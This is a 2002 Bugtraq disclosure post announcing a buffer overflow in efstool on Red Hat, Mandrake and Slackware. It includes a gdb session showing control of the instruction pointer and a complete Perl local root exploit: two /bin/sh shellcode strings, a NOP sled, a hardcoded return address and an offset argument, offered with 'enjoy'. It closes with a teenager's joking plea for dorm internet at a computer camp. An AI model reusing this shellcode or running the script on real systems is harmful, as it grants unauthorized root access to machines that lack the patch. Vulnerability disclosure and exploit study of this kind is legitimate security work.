efstool local root exploit
Date: 28 Jun 2002 00:46:39 -0000
From: clorox@ptrace-networks.net
To: bugtraq@securityfocus.com
Subject: efstool local root exploit
Ptrace Networks Security
--------------------------
An error in the efstool program on redhat, mandrake, and slackware
is able to be successfully exploited through a buffer overflow.
[clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`
Segmentation fault
[clorox@ptnw clorox]$ gdb efstool
GNU gdb 5.1.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...(no debugging symbols
found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbfffe890 0xbfffe890
(gdb)
example:
#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000
$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";
$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";
$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";
if ($ARGV[1] eq "m1") {
$len = 3000;
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
$len = 10010;
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode2;
} else {
print "You must specify a method fool!\n";
print "perl $0 <offset> m1 or m2\n";
}
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
# and on the seventh day clorox said "LET THERE BE SHELL!"
and on a personal note,
grogan, or any other admins of ceboston, the campers here deserve internet
in our rooms, the computer labs arent condusive to doing research. as you
can see we would use it for positive things such as posting to bug traq if
you read this and want to talk it over talk to me im in room 105 in new
dorm.
-max
